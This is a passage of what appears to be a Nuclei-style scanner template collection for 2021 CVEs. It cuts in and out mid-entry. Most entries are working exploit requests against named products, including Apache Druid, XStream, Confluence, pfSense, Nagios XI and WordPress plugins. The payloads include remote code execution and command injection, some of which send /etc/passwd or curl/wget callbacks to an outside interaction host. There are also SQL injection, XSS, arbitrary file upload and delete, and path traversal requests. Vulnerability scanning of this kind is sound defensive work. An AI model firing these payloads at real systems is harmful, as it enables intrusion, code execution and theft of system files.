(v8\\.(?:(?:1|0)\\.[0-9]|2\\.[0-2]))"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","group":1,"regex":["\"subTitle\":\"Grafana ([a-z0-9.]+)"]}]}]},{"id":"CVE-2021-31602","info":{"name":"Hitachi Vantara Pentaho/Business Intelligence Server - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/pentaho/api/userrolelist/systemRoles?require-cfg.js","{{BaseURL}}/api/userrolelist/systemRoles?require-cfg.js"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<roleList>","<roles>Anonymous</roles>"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24917","info":{"name":"WordPress WPS Hide Login <1.9.1 - Information Disclosure","severity":"high"},"requests":[{"raw":["GET /wp-admin/options.php HTTP/1.1\nHost: {{Hostname}}\nReferer: something\n"],"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["!contains(tolower(location), 'wp-login.php')"]},{"type":"word","part":"header","words":["redirect_to=%2Fwp-admin%2Fsomething&reauth=1"]}],"extractors":[{"type":"kval","kval":["location"]}]}]},{"id":"CVE-2021-30151","info":{"name":"Sidekiq <=6.2.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/sidekiq/queues/\"onmouseover=\"alert(document.domain)\""],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=\"alert(document.domain)"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-25646","info":{"name":"Apache Druid - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST /druid/indexer/v1/sampler HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/json\n\n{\n\"type\":\"index\",\n\"spec\":{\n   \"ioConfig\":{\n      \"type\":\"index\",\n      \"firehose\":{\n         \"type\":\"local\",\n         \"baseDir\":\"/etc\",\n         \"filter\":\"passwd\"\n      }\n   },\n   \"dataSchema\":{\n      \"dataSource\":\"odgjxrrrePz\",\n      \"parser\":{\n         \"parseSpec\":{\n            \"format\":\"javascript\",\n            \"timestampSpec\":{\n\n            },\n            \"dimensionsSpec\":{\n\n            },\n            \"function\":\"function(){var hTVCCerYZ = new java.util.Scanner(java.lang.Runtime.getRuntime().exec(\\\"/bin/sh`@~-c`@~cat /etc/passwd\\\".split(\\\"`@~\\\")).getInputStream()).useDelimiter(\\\"\\\\A\\\").next();return {timestamp:\\\"4137368\\\",OQtGXcxBVQVL: hTVCCerYZ}}\",\n            \"\":{\n               \"enabled\":\"true\"\n            }\n         }\n      }\n   }\n},\n\"samplerConfig\":{\n   \"numRows\":10\n}\n}\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["numRowsRead","numRowsIndexed"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20092","info":{"name":"Buffalo WSR-2533DHPL2 - Improper Access Control","severity":"high"},"requests":[{"raw":["GET /images/..%2finfo.html HTTP/1.1\nHost: {{Hostname}}\nReferer: {{BaseURL}}/info.html\n","GET /images/..%2fcgi/cgi_i_filter.js?_tn={{trimprefix(base64_decode(httoken), base64_decode(\"R0lGODlhAQABAIAAAAAAAP///yH5BAEAAAAALAAAAAABAAEAAAIBRAA7\"))}} HTTP/1.1\nHost: {{Hostname}}\nCookie: lang=8; url=ping.html; mobile=false;\nReferer: {{BaseURL}}/info.html\nContent-Type: application/x-www-form-urlencoded\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/x-javascript"]},{"type":"word","words":["/*DEMO*/","addCfg("],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"httoken","group":1,"regex":["base64\\,(.*?)\" border="],"internal":true}]}]},{"id":"CVE-2021-26247","info":{"name":"Cacti - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/auth_changepassword.php?ref=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["\"></script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-38314","info":{"name":"WordPress Redux Framework <=4.2.11 - Information Disclosure","severity":"medium"},"requests":[{"raw":["GET /wp-admin/admin-ajax.php?action={{md5(replace('http://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n","GET /wp-admin/admin-ajax.php?action={{md5(replace('https://HOST/-redux','HOST',Hostname))}} HTTP/1.1\nHost: {{Hostname}}\nAccept: */*\n"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["len(body)<50"]},{"type":"regex","name":"meme","part":"body","regex":["[a-f0-9]{32}"]},{"type":"status","status":[200]}],"extractors":[{"type":"regex","regex":["[a-f0-9]{32}"],"part":"body"}]}]},{"id":"CVE-2021-41282","info":{"name":"pfSense - Arbitrary File Write","severity":"high"},"requests":[{"raw":["GET /index.php HTTP/1.1\nHost: {{Hostname}}\n","POST /index.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\n__csrf_magic={{csrf_token}}&usernamefld={{username}}&passwordfld={{password}}&login=\n","GET /diag_routes.php?isAjax=1&filter=.*/!d;};s/Destination/\\x3c\\x3fphp+var_dump(md5(\\x27CVE-2021-41282\\x27));unlink(__FILE__)\\x3b\\x3f\\x3e/;w+/usr/local/www/test.php%0a%23 HTTP/1.1\nHost: {{Hostname}}\n","GET /test.php HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["contains(body, 'c3959e8a43f1b39b0d1255961685a238')","status_code==200"],"condition":"and"}],"extractors":[{"type":"regex","name":"csrf_token","group":1,"regex":["(sid:[a-z0-9,;:]+)"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-31581","info":{"name":"Akkadian Provisioning Manager - Information Disclosure","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/pme/database/pme/phinx.yml"],"matchers-condition":"and","matchers":[{"type":"word","words":["host:","name:","pass:"],"condition":"and"},{"type":"word","negative":true,"words":["html>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27520","info":{"name":"FUDForum 3.1.0 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D","{{BaseURL}}/forum/index.php?SQ=0&t=search&srch={{randstr}}&btn_submit=Search&field=all&forum_limiter=&attach=0&search_logic=AND&sort_order=REL&author=x\"+onmouseover%3Dalert%28document.domain%29+x%3D%22"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["onmouseover=alert(document.domain) x=","FUDforum"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-41951","info":{"name":"Resourcespace - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/plugins/wordpress_sso/pages/index.php?wordpress_user=%3Cscript%3Ealert(1)%3C/script%3E"],"matchers-condition":"and","matchers":[{"type":"word","words":["TEST<script>alert(1)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-30175","info":{"name":"ZEROF Web Server 1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /HandleEvent HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nAjax=1&IsEvent=1&Obj=O4F&Evt=click&this=O4F&\"_fp_=_S_ID=CteTYLjmYw108029DC1&O33=%020%02%02'&O37=%020%02%02fff\"&_seq_=2&_uo_=O\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["You have an error in your SQL syntax"]},{"type":"word","part":"header","words":["ZEROF"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-22214","info":{"name":"Gitlab CE/EE 10.5 - Server-Side Request Forgery","severity":"high"},"requests":[{"method":"POST","path":["{{BaseURL}}/api/v4/ci/lint?include_merged_yaml=true"],"body":"{\"content\": \"include:\\n  remote: http://127.0.0.1:9100/test.yml\"}\n","headers":{"Content-Type":"application/json"},"host-redirects":true,"max-redirects":3,"matchers":[{"type":"word","part":"body","words":["does not have valid YAML syntax"]}]}]},{"id":"CVE-2021-20167","info":{"name":"Netgear RAX43 1.0.3.96 - Command Injection/Authentication Bypass Buffer Overrun","severity":"high"},"requests":[{"raw":["POST /cgi-bin/readycloud_control.cgi?1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111/api/users HTTP/1.1\nHost: {{Hostname}}\n\n\"name\":\"';$(curl {{interactsh-url}});'\",\n\"email\":\"a@b.c\"\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-24666","info":{"name":"WordPress Podlove Podcast Publisher <3.5.6 - SQL Injection","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php?rest_route=/podlove/v1/social/services/contributor/1&id=1%20UNION%20ALL%20SELECT%20NULL,NULL,md5('CVE-2021-24666'),NULL,NULL,NULL--%20-"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["66a82937a7660b73b00d4f7cefee6c85","\"service_id\""],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-33544","info":{"name":"Geutebruck - Remote Command Injection","severity":"high"},"requests":[{"raw":["GET //uapi-cgi/certmngr.cgi?action=createselfcert&local=anything&country=AA&state=%24(wget%20http://{{interactsh-url}})&organization=anything&organizationunit=anything&commonname=anything&days=1&type=anything HTTP/1.1\nHost: {{Hostname}}\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\n"],"matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]}]}]},{"id":"CVE-2021-25296","info":{"name":"Nagios XI 5.5.6-5.7.5 - Authenticated Remote Command Injection","severity":"high"},"requests":[{"raw":["GET /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\n","POST /nagiosxi/login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nnsp={{nsp}}&pageopt=login&username={{username}}&password={{password}}\n","GET /nagiosxi/index.php HTTP/1.1\nHost: {{Hostname}}\n","@timeout: 20s\nGET /nagiosxi/config/monitoringwizard.php?update=1&nsp={{nsp_auth}}&nextstep=3&wizard=windowswmi&check_wmic_plus_ver=1.65&ip_address=127.0.0.1&domain=127.0.0.1&username=username&password=password&plugin_output_len=9999%3bwget%20{{interactsh-url}}%3b HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body_4","words":["Event Log","Display Name"],"condition":"and"},{"type":"status","status":[200]}],"extractors":[{"type":"regex","name":"nsp","group":1,"regex":["name=['\"]nsp['\"] value=['\"](.*)['\"]>"],"internal":true,"part":"body"},{"type":"regex","name":"nsp_auth","group":1,"regex":["var nsp_str = ['\"](.*)['\"];"],"internal":true,"part":"body"}]}]},{"id":"CVE-2021-25112","info":{"name":"WordPress WHMCS Bridge <6.4b - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/options-general.php?page=cc-ce-bridge-cp&error=%3Cimg%20src%20onerror=alert(document.domain)%3E HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<strong><img src onerror=alert(document.domain)></strong>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24287","info":{"name":"WordPress Select All Categories and Taxonomies <1.3.2 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/options-general.php?page=moove-taxonomy-settings&tab=\"+style=animation-name:rotation+onanimationstart=\"alert(document.domain); HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"Set up the taxonomies\")"],"condition":"and"}]}]},{"id":"CVE-2021-43725","info":{"name":"Spotweb <= 1.5.1 - Cross Site Scripting (Reflected)","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/?data[performredirect]=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E&page=login"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\"><script>alert(document.domain)</script>","name=\"data[performredirect]"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24488","info":{"name":"WordPress Post Grid <2.1.8 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword=\"onmouseover=alert(document.domain)// HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"\\\"onmouseover=alert(document.domain)/\">","Post Grid"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27316","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"high"},"requests":[{"raw":["@timeout: 10s\nPOST /contactus.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nfirstname={{randstr}}&lastname=test'+AND+(SELECT+6133+FROM+(SELECT(SLEEP(6)))nOqb)+AND+'RiUU'='RiUU&email={{randstr}}%40test.com&comment={{randstr}}&submit=Send+Us\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 500","contains(body, \"Medical Management System\")"],"condition":"and"}]}]},{"id":"CVE-2021-40868","info":{"name":"Cloudron 6.2 Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/login.html?returnTo=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["text/html"]},{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-26084","info":{"name":"Confluence Server - Remote Code Execution","severity":"critical"},"requests":[{"raw":["POST /{{path}} HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nqueryString=aaaa\\u0027%2b#{16*8787}%2b\\u0027bbb\n"],"payloads":{"path":["pages/createpage-entervariables.action?SpaceKey=x","pages/createpage-entervariables.action","confluence/pages/createpage-entervariables.action?SpaceKey=x","confluence/pages/createpage-entervariables.action","wiki/pages/createpage-entervariables.action?SpaceKey=x","wiki/pages/createpage-entervariables.action","pages/doenterpagevariables.action","pages/createpage.action?spaceKey=myproj","pages/templates2/viewpagetemplate.action","pages/createpage-entervariables.action","template/custom/content-editor","templates/editor-preload-container","users/user-dark-features"]},"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["value=\"aaaa{140592=null}"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46424","info":{"name":"Telesquare TLR-2005KSH 1.0.0 - Arbitrary File Delete","severity":"critical"},"requests":[{"raw":["GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","DELETE /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n","GET /images/icons_title.gif HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"dsl","dsl":["status_code_1 == 200 && status_code_2 == 204 && status_code_3 == 404"]}]}]},{"id":"CVE-2021-24284","info":{"name":"WordPress Kaswara Modern VC Addons <=3.0.1 - Arbitrary File Upload","severity":"critical"},"requests":[{"raw":["POST /wp-admin/admin-ajax.php?action=uploadFontIcon HTTP/1.1\nHost: {{Hostname}}\nContent-Type: multipart/form-data; boundary=------------------------d3be34324392a708\n\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fonticonzipfile\"; filename=\"{{zip_file}}.zip\"\nContent-Type: application/octet-stream\n\n{{hex_decode('504B03040A0000000000FA73F454B2333E07140000001400000006001C00')}}{{php_file}}{{hex_decode('555409000366CBD76267CBD76275780B000104F50100000414000000')}}{{php_cmd}}{{hex_decode('0A504B01021E030A00000000002978F454E49BC1591300000013000000060018000000000001000000A48100000000')}}{{php_file}}{{hex_decode('555405000366CBD76275780B000104F50100000414000000504B050600000000010001004C000000530000000000')}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"fontsetname\"\n\n{{zip_file}}\n--------------------------d3be34324392a708\nContent-Disposition: form-data; name=\"action\"\n\nuploadFontIcon\n--------------------------d3be34324392a708--\n","GET /wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/{{php_file}} HTTP/1.1\nHost: {{Hostname}}\n"],"req-condition":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body_1","words":["wp-content/uploads/kaswara/fonts_icon/{{zip_file}}/style.css"]},{"type":"word","part":"body_2","words":["phpinfo()"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-27124","info":{"name":"Doctor Appointment System 1.0 - SQL Injection","severity":"medium"},"requests":[{"raw":["POST /patient/search_result.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nexpertise=Heart'+UNION+ALL+SELECT+NULL,NULL,NULL,NULL,NULL,md5('999999999'),NULL,NULL,NULL,NULL,NULL,NULL--+-&submit=\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["c8c605999f3d8352d7bb792cf3fdb25b","Doctor Appoinment System"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-31862","info":{"name":"SysAid 20.4.74 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/KeepAlive.jsp?stamp=%3Cscript%3Ealert(document.domain)%3C/script%3E"],"matchers":[{"type":"dsl","dsl":["(body == \"false <script>alert(document.domain)</script>\")","status_code == 200"],"condition":"and"}]}]},{"id":"CVE-2021-29442","info":{"name":"Nacos <1.4.1 - Authentication Bypass","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/nacos/v1/cs/ops/derby?sql=select+st.tablename+from+sys.systables+st"],"matchers-condition":"and","matchers":[{"type":"word","part":"header","words":["application/json"]},{"type":"regex","part":"body","regex":["\"TABLENAME\":\"(?:(?:(?:(?:(?:APP_CONFIGDATA_RELATION_[PS]UB|SYS(?:(?:CONGLOMERAT|ALIAS|(?:FI|RO)L)E|(?:(?:ROUTINE)?|COL)PERM|(?:FOREIGN)?KEY|CONSTRAINT|T(?:ABLEPERM|RIGGER)|S(?:TAT(?:EMENT|ISTIC)|EQUENCE|CHEMA)|DEPEND|CHECK|VIEW|USER)|USER|ROLE)S|CONFIG_(?:TAGS_RELATION|INFO_(?:AGGR|BETA|TAG))|TENANT_CAPACITY|GROUP_CAPACITY|PERMISSIONS|SYSCOLUMNS|SYS(?:DUMMY1|TABLES)|APP_LIST)|CONFIG_INFO)|TENANT_INFO)|HIS_CONFIG_INFO)\""]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24239","info":{"name":"WordPress Pie Register <3.7.0.1 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/wp-admin/admin.php?page=pr_new_registration_form&show_dash_widget=1&invitaion_code=PHNjcmlwdD5hbGVydChkb2N1bWVudC5kb21haW4pOzwvc2NyaXB0Pg=="],"matchers":[{"type":"dsl","dsl":["status_code == 200","contains(body, \"<script>alert(document.domain);</script>\") && contains(body, \"invitaion-code-table\")"],"condition":"and"}]}]},{"id":"CVE-2021-21315","info":{"name":"Node.JS System Information Library <5.3.1 - Remote Command Injection","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["wget --post-file /etc/passwd {{interactsh-url}}","name","running","pids"],"condition":"and"},{"type":"word","part":"header","words":["application/json"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-32682","info":{"name":"elFinder 2.1.58 - Remote Code Execution","severity":"critical"},"requests":[{"method":"GET","path":["{{BaseURL}}/admin/elfinder/elfinder-cke.html","{{BaseURL}}/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/assets/elFinder-2.1.9/elfinder.html","{{BaseURL}}/assets/elFinder/elfinder.html","{{BaseURL}}/backend/elfinder/elfinder-cke.html","{{BaseURL}}/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder-cke.html","{{BaseURL}}/uploads/assets/backend/elfinder/elfinder.html","{{BaseURL}}/uploads/elfinder/elfinder-cke.html"],"stop-at-first-match":true,"matchers-condition":"and","matchers":[{"type":"word","words":["elfinder","php/connector"],"condition":"and"},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-3223","info":{"name":"Node RED Dashboard <2.26.2 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd","{{BaseURL}}/ui_base/js/..%2f..%2f..%2f..%2fsettings.js"],"matchers-condition":"or","matchers":[{"type":"word","part":"body","words":["Node-RED web server is listening"]},{"type":"regex","part":"body","regex":["root:.*:0:0:"]}]}]},{"id":"CVE-2021-24227","info":{"name":"Patreon WordPress  <1.7.0 - Unauthenticated Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?patron_only_image=../../../../../../../../../../etc/passwd&patreon_action=serve_patron_only_image"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:[x*]:0:0"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-46387","info":{"name":"Zyxel ZyWALL 2 Plus Internet Security Appliance - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/Forms/rpAuth_1?id=</form><iMg%20src=x%20onerror=\"prompt(document.domain)\"><form>"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["<iMg src=x onerror=\"prompt(document.domain)\"><form>","Entry Error"],"condition":"and"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-40908","info":{"name":"Purchase Order Management v1.0 - SQL Injection","severity":"critical"},"requests":[{"raw":["POST /classes/Login.php?f=login HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded; charset=UTF-8\n\nusername=test'+AND+(SELECT+4458+FROM+(SELECT(SLEEP(6)))JblN)+AND+'orQN'='orQN&password=test\n"],"matchers":[{"type":"dsl","dsl":["duration>=6","status_code == 200","contains(header, \"text/html\")","contains(body, \"status\\\":\\\"incorrect\\\"\")"],"condition":"and"}]}]},{"id":"CVE-2021-39144","info":{"name":"XStream 1.4.18  - Remote Code Execution","severity":"high"},"requests":[{"raw":["POST / HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<java.util.PriorityQueue serialization='custom'>\n  <unserializable-parents/>\n  <java.util.PriorityQueue>\n    <default>\n      <size>2</size>\n    </default>\n    <int>3</int>\n    <dynamic-proxy>\n      <interface>java.lang.Comparable</interface>\n      <handler class='sun.tracing.NullProvider'>\n        <active>true</active>\n        <providerType>java.lang.Comparable</providerType>\n        <probes>\n          <entry>\n            <method>\n              <class>java.lang.Comparable</class>\n              <name>compareTo</name>\n              <parameter-types>\n                <class>java.lang.Object</class>\n              </parameter-types>\n            </method>\n            <sun.tracing.dtrace.DTraceProbe>\n              <proxy class='java.lang.Runtime'/>\n              <implementing__method>\n                <class>java.lang.Runtime</class>\n                <name>exec</name>\n                <parameter-types>\n                  <class>java.lang.String</class>\n                </parameter-types>\n              </implementing__method>\n            </sun.tracing.dtrace.DTraceProbe>\n          </entry>\n        </probes>\n      </handler>\n    </dynamic-proxy>\n    <string>curl http://{{interactsh-url}}</string>\n  </java.util.PriorityQueue>\n</java.util.PriorityQueue>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["http"]},{"type":"word","part":"interactsh_request","words":["User-Agent: curl"]}]}]},{"id":"CVE-2021-28377","info":{"name":"Joomla! ChronoForums 2.0.11 - Local File Inclusion","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/index.php/component/chronoforums2/profiles/avatar/u1?tvout=file&av=../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-35265","info":{"name":"MaxSite CMS > V106 - Cross-Site Scripting","severity":"medium"},"requests":[{"method":"GET","path":["{{BaseURL}}/page/hello/1%22%3E%3Csvg/onload=alert(document.domain)%3E","{{BaseURL}}/page/1%22%3E%3Csvg/onload=alert(document.domain)%3E"],"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["><svg/onload=alert(document.domain)>"]},{"type":"word","part":"body","words":["mso-comments-rss\">RSS</a>","MaxSite CMS","feed\"><span>RSS</span>"],"condition":"or"},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-20792","info":{"name":"WordPress Quiz and Survey Master <7.1.14 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nOrigin: {{RootURL}}\nContent-Type: application/x-www-form-urlencoded\nCookie: wordpress_test_cookie=WP%20Cookie%20check\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In&testcookie=1\n","GET /wp-admin/admin.php?page=mlw_quiz_list&s=\"></script><script>alert(document.domain)</script>&paged=\"></script><script>alert(document.domain)</script> HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers-condition":"and","matchers":[{"type":"word","part":"body","words":["</script><script>alert(document.domain)</script>"]},{"type":"word","part":"header","words":["text/html"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39433","info":{"name":"BIQS IT Biqs-drive v1.83 Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/download/index.php?file=../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-39316","info":{"name":"WordPress DZS Zoomsounds <=6.50 - Local File Inclusion","severity":"high"},"requests":[{"method":"GET","path":["{{BaseURL}}/?action=dzsap_download&link=../../../../../../../../../../../../../etc/passwd"],"matchers-condition":"and","matchers":[{"type":"regex","regex":["root:.*:0:0:"]},{"type":"status","status":[200]}]}]},{"id":"CVE-2021-24875","info":{"name":"WordPress eCommerce Product Catalog <3.0.39 - Cross-Site Scripting","severity":"medium"},"requests":[{"raw":["POST /wp-login.php HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/x-www-form-urlencoded\n\nlog={{username}}&pwd={{password}}&wp-submit=Log+In\n","GET /wp-admin/edit.php?post_type=al_product&page=product-settings.php&ic-settings-search=%22+style%3Danimation-name%3Arotation+onanimationstart%3Dalert%28document.domain%29%2F%2F HTTP/1.1\nHost: {{Hostname}}\n"],"cookie-reuse":true,"matchers":[{"type":"dsl","dsl":["status_code_2 == 200","contains(body_2, \"alert(document.domain)\")","contains(body_2, \"eCommerce Product Catalog\")"],"condition":"and"}]}]},{"id":"CVE-2021-26295","info":{"name":"Apache OFBiz <17.12.06 - Arbitrary Code Execution","severity":"critical"},"requests":[{"raw":["POST /webtools/control/SOAPService HTTP/1.1\nHost: {{Hostname}}\nContent-Type: application/xml\n\n<?xml version='1.0' encoding='UTF-8'?>\n<soapenv:Envelope\n  xmlns:soapenv=\"http://schemas.xmlsoap.org/soap/envelope/\">\n  <soapenv:Header/>\n    <soapenv:Body>\n      <ns1:clearAllEntityCaches xmlns:ns1=\"http://ofbiz.apache.org/service/\">\n          <ns1:cus-obj>{{generate_java_gadget(\"dns\", \"https://{{interactsh-url}}\", \"hex\")}}</ns1:cus-obj>\n      </ns1:clearAllEntityCaches>\n    </soapenv:Body>\n</soapenv:Envelope>\n"],"matchers-condition":"and","matchers":[{"type":"word","part":"interactsh_protocol","words":["dns"]},{"type":"word","part":"body","words":["errorMessage"],"condition":"and"},{"type":"word","part":"header","words":["OFBiz.Visitor="]}]}]},{"id":"CVE-2021-3654","info":{"name":"Nova noVNC - Open 